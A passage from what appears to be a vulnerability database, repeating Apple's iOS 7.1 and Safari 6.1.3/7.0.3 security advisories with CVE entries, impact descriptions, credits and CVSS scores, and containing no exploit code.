changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
dyld
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions. This issue was
addressed through improved handling of FaceTime calls.
CVE-ID
CVE-2014-1274
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOKit HID Event
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may monitor on user actions in other
apps
Description: An interface in IOKit framework allowed malicious apps
to monitor on user actions in other apps. This issue was addressed
through improved access control policies in the framework.
CVE-ID
CVE-2014-1276 : Min Zheng, Hui Xue, and Dr. Tao (Lenx) Wei of FireEye
iTunes Store
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A man-in-the-middle attacker may entice a user into
downloading a malicious app via Enterprise App Download
Description: An attacker with a privileged network position could
spoof network communications to entice a user into downloading a
malicious app. This issue was mitigated by using SSL and prompting
the user during URL redirects.
CVE-ID
CVE-2014-1277 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Office Viewer
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted Microsoft Word document may
lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in the handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
Photos Backend
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Deleted images may still appear in the Photos app underneath
transparent images
Description: Deleting an image from the asset library did not delete
cached versions of the image. This issue was addressed through
improved cache management.
CVE-ID
CVE-2014-1281 : Walter Hoelblinger of Hoelblinger.com, Morgan Adams,
Tom Pennington
Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unexpected site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Settings - Accounts
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
disable Find My iPhone without entering an iCloud password
Description: A state management issue existed in the handling of the
Find My iPhone state. This issue was addressed through improved
handling of Find My iPhone state.
CVE-ID
CVE-2014-1284
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device has not been
activated
Description: An unexpected application termination during activation
could cause the phone to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2014-1285 : Roboboi99
SpringBoard Lock Screen
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker may be able to cause the lock screen to
become unresponsive
Description: A state management issue existed in the lock screen.
This issue was addressed through improved state management.
CVE-ID
CVE-2014-1286 : Bogdan Alecu of M-sec.net
TelephonyUI Framework
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A webpage could trigger a FaceTime audio call without user
interaction
Description: Safari did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
USB Host
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
Video Driver
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvJAAoJEPefwLHPlZEwh2cP/iOvfDbgv78TKX2hsxttcy8l
NTK4EbpYO0rEpqbQukIHwBrb+PtEWK4tdxWPNQV+8GnCPaLqmMXWxHZPkI02qXjI
UxYNgPq+9MPcoFFdbbptz4azcwFa0rdsQtxL0MYRrUqW5ml86zjGsVWUDGMDFu9R
fuujvU/JOGoIYVxFQziEScnMfryw61b/JObcT/mDzXv/IcKhuMzMfp4cbnXq7Mmx
NOpIQ0syx5oH7jadJA72iX7UyUuoydAcD3gaJDbLLfjEM8giDTL/TmH1HpuJjDHq
Zmj0NMlMqAztoFzpHZxlJ6kYjFYs7heyWgm3HQ+dwT0cDajFEZUEJGuBBO+P6dwp
cVlhDJ87crsP2ctUn46EUGFw5fFZRPEUqm4r0M/3o8z2ZPDqFxIBwMHEEV2LJtuN
lKjHYYWTO9BZOg87pm/HLpNqqTEz7J1eDWVJiRh5kZarp8w5KgZhBhYkltlPKwOo
Uh1SvUH+CjgNQTObSLv+e2EJ0So8gi3xBGHOrOdcof33fTsyL4WDvHEIvs4l1jUY
f29uha46K3dVZpJtFV3xTiwm6fodWgTR4xhWSAAVI2V8V4KLQMEHu7+eV+cURmme
JLdVgzxXw0uZHP874Uy60qR+6KBdEkIvgAoDHmd9jLnZMJTQAcn7PjcZz2z/V25u
3bQ2RrEc85Xqs7adpinL
=W1ik
-----END PGP SIGNATURE-----
| VAR-201403-0251 | CVE-2014-1294 | Apple iOS and Apple TV Used in etc. Webkit Vulnerabilities in arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit, as used in Apple iOS before 7.1 and Apple TV before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2014-1289, CVE-2014-1290, CVE-2014-1291, CVE-2014-1292, and CVE-2014-1293. Apple iOS and Apple TV Used in etc. WebKit is prone to multiple memory-corruption vulnerabilities.
An attacker can exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-04-01-1 Safari 6.1.3 and Safari 7.0.3
Safari 6.1.3 and Safari 7.0.3 are now available and address the
following:
WebKit
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2871 : miaubiz
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-6625 : cloudfuzzer
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
CVE-2014-1298 : Google Chrome Security Team
CVE-2014-1299 : Google Chrome Security Team, Apple, Renata Hodovan of
University of Szeged / Samsung Electronics
CVE-2014-1300 : Ian Beer of Google Project Zero working with HP's
Zero Day Initiative
CVE-2014-1301 : Google Chrome Security Team
CVE-2014-1302 : Google Chrome Security Team, Apple
CVE-2014-1303 : KeenTeam working with HP's Zero Day Initiative
CVE-2014-1304 : Apple
CVE-2014-1305 : Apple
CVE-2014-1307 : Google Chrome Security Team
CVE-2014-1308 : Google Chrome Security Team
CVE-2014-1309 : cloudfuzzer
CVE-2014-1310 : Google Chrome Security Team
CVE-2014-1311 : Google Chrome Security Team
CVE-2014-1312 : Google Chrome Security Team
CVE-2014-1313 : Google Chrome Security Team
CVE-2014-1713 : VUPEN working with HP's Zero Day Initiative
WebKit
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2
Impact: An attacker running arbitary code in the WebProcess may be
able to read arbitrary files despite sandbox restrictions
Description: A logic issue existed in the handling of IPC messages
from the WebProcess. This issue was addressed through additional
validation of IPC messages.
CVE-ID
CVE-2014-1297 : Ian Beer of Google Project Zero
For OS X Mavericks and OS X Mountain Lion systems, Safari 7.0.3
and Safari 6.1.3 may be obtained from Mac App Store.
For OS X Lion systems Safari 6.1.3 is available via the Apple
Software Update application.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTOwlLAAoJEPefwLHPlZEwmPYP/AoGVbrVVEQfbWZ/OMER6jCR
bDN4ykWdExJFRKr972tsirke9mLrDX1Flqg3jYpqrna6lWsZxk1wA/IXy4TRG97O
mpA75r7853lCJ482h5XImTdv6wWqMfTTNR1YzsK+TCLZA3sDlByQ4yshwGWhOf1Q
nY+hPpaC05PEmPeNKMWw6PA9IgA9e84uy0b/3+c2acOUZ9aAYEXmydPySY+5uYLa
ecXjvee83LVTu8Pq2/C9yCJ1kI1EMix6Q3CTb2Cv/Dtgu1q7rZMG7qKieFpMKO2J
xM7RYm1qPNlZ4hf+ZPX+D4+k6g2sZMqYdocdG1qXubk8m314CinHajdsZH9jXDHO
01gnYeMRp2IUBJlClQ7mPyIveJqJV9XpzvMTciuTVEuhzWhMaazzly8dp+8NCu4Q
QShPJKqAq16ACJqqOarwo8xaSumZ3UcKhVrD0Gxo1/dhzO1Hy52yo7WrWLaOVH89
bXPeVMfYIF0V9xysbixNmBIEro0mYDuor/XlXBFicZAjmyGEVE04K4UjenMeDoYO
/1A2zaVyM9MD50y+X/rFErtz2cj7uNcZ1XSNqPdGameoti5WvvoRbKs/D/H7E8bX
p8JDoVJoy46fOBfwNv6eaQYTGYzgtdoEtmTKL3zDauQC1bxI1Jwtma07S97D2SyJ
urMcI/V2h8JnGD4sS/7L
=kHuK
-----END PGP SIGNATURE-----
| VAR-201403-0258 | CVE-2014-1278 | Apple iOS and Apple TV of ARM Kernel ptmx_get_ioctl Vulnerabilities that can be used to acquire privileges in functions |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The ptmx_get_ioctl function in the ARM kernel in Apple iOS before 7.1 and Apple TV before 6.1 allows local users to gain privileges or cause a denial of service (out-of-bounds memory access and device crash) via a crafted call. Apple iOS and TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
The following products are vulnerable:
Apple iOS versions prior to 7.1
Apple TV versions prior to 6.1. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-1 iOS 7.1
iOS 7.1 is now available and addresses the following:
Backup
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A maliciously crafted backup can alter the filesystem
Description: A symbolic link in a backup would be restored, allowing
subsequent operations during the restore to write to the rest of the
filesystem. This issue was addressed by checking for symbolic links
during the restore process.
CVE-ID
CVE-2013-5133 : evad3rs
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
Configuration Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
CoreCapture
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Crash Reporting
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
dyld
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
FaceTime
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
access FaceTime contacts from the lock screen
Description: FaceTime contacts on a locked device could be exposed
by making a failed FaceTime call from the lock screen. This issue was
addressed through improved handling of FaceTime calls.
CVE-ID
CVE-2014-1274
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOKit HID Event
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may monitor on user actions in other
apps
Description: An interface in IOKit framework allowed malicious apps
to monitor on user actions in other apps. This issue was addressed
through improved access control policies in the framework.
CVE-ID
CVE-2014-1276 : Min Zheng, Hui Xue, and Dr. Tao (Lenx) Wei of FireEye
iTunes Store
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A man-in-the-middle attacker may entice a user into
downloading a malicious app via Enterprise App Download
Description: An attacker with a privileged network position could
spoof network communications to entice a user into downloading a
malicious app. This issue was mitigated by using SSL and prompting
the user during URL redirects.
CVE-ID
CVE-2014-1277 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Office Viewer
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted Microsoft Word document may
lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in the handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
Photos Backend
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Deleted images may still appear in the Photos app underneath
transparent images
Description: Deleting an image from the asset library did not delete
cached versions of the image. This issue was addressed through
improved cache management.
CVE-ID
CVE-2014-1281 : Walter Hoelblinger of Hoelblinger.com, Morgan Adams,
Tom Pennington
Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unexpected site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Settings - Accounts
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
disable Find My iPhone without entering an iCloud password
Description: A state management issue existed in the handling of the
Find My iPhone state. This issue was addressed through improved
handling of Find My iPhone state.
CVE-ID
CVE-2014-1284
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device has not been
activated
Description: An unexpected application termination during activation
could cause the phone to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2014-1285 : Roboboi99
SpringBoard Lock Screen
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker may be able to cause the lock screen to
become unresponsive
Description: A state management issue existed in the lock screen.
This issue was addressed through improved state management.
CVE-ID
CVE-2014-1286 : Bogdan Alecu of M-sec.net
TelephonyUI Framework
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A webpage could trigger a FaceTime audio call without user
interaction
Description: Safari did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
USB Host
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
Video Driver
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvJAAoJEPefwLHPlZEwh2cP/iOvfDbgv78TKX2hsxttcy8l
NTK4EbpYO0rEpqbQukIHwBrb+PtEWK4tdxWPNQV+8GnCPaLqmMXWxHZPkI02qXjI
UxYNgPq+9MPcoFFdbbptz4azcwFa0rdsQtxL0MYRrUqW5ml86zjGsVWUDGMDFu9R
fuujvU/JOGoIYVxFQziEScnMfryw61b/JObcT/mDzXv/IcKhuMzMfp4cbnXq7Mmx
NOpIQ0syx5oH7jadJA72iX7UyUuoydAcD3gaJDbLLfjEM8giDTL/TmH1HpuJjDHq
Zmj0NMlMqAztoFzpHZxlJ6kYjFYs7heyWgm3HQ+dwT0cDajFEZUEJGuBBO+P6dwp
cVlhDJ87crsP2ctUn46EUGFw5fFZRPEUqm4r0M/3o8z2ZPDqFxIBwMHEEV2LJtuN
lKjHYYWTO9BZOg87pm/HLpNqqTEz7J1eDWVJiRh5kZarp8w5KgZhBhYkltlPKwOo
Uh1SvUH+CjgNQTObSLv+e2EJ0So8gi3xBGHOrOdcof33fTsyL4WDvHEIvs4l1jUY
f29uha46K3dVZpJtFV3xTiwm6fodWgTR4xhWSAAVI2V8V4KLQMEHu7+eV+cURmme
JLdVgzxXw0uZHP874Uy60qR+6KBdEkIvgAoDHmd9jLnZMJTQAcn7PjcZz2z/V25u
3bQ2RrEc85Xqs7adpinL
=W1ik
-----END PGP SIGNATURE-----
| VAR-201403-0255 | CVE-2014-1275 | Apple iOS and Apple TV of ImageIO Vulnerable to buffer overflow |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Buffer overflow in ImageIO in Apple iOS before 7.1 and Apple TV before 6.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted JPEG2000 data in a PDF document. Apple iOS and TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
The following products are vulnerable:
Apple iOS versions prior to 7.1
Apple TV versions prior to 6.1. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-1 iOS 7.1
iOS 7.1 is now available and addresses the following:
Backup
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A maliciously crafted backup can alter the filesystem
Description: A symbolic link in a backup would be restored, allowing
subsequent operations during the restore to write to the rest of the
filesystem. This issue was addressed by checking for symbolic links
during the restore process.
CVE-ID
CVE-2013-5133 : evad3rs
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
Configuration Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
CoreCapture
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Crash Reporting
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
dyld
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
FaceTime
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
access FaceTime contacts from the lock screen
Description: FaceTime contacts on a locked device could be exposed
by making a failed FaceTime call from the lock screen. This issue was
addressed through improved handling of FaceTime calls.
CVE-ID
CVE-2014-1274
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOKit HID Event
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may monitor on user actions in other
apps
Description: An interface in IOKit framework allowed malicious apps
to monitor on user actions in other apps. This issue was addressed
through improved access control policies in the framework.
CVE-ID
CVE-2014-1276 : Min Zheng, Hui Xue, and Dr. Tao (Lenx) Wei of FireEye
iTunes Store
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A man-in-the-middle attacker may entice a user into
downloading a malicious app via Enterprise App Download
Description: An attacker with a privileged network position could
spoof network communications to entice a user into downloading a
malicious app. This issue was mitigated by using SSL and prompting
the user during URL redirects.
CVE-ID
CVE-2014-1277 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
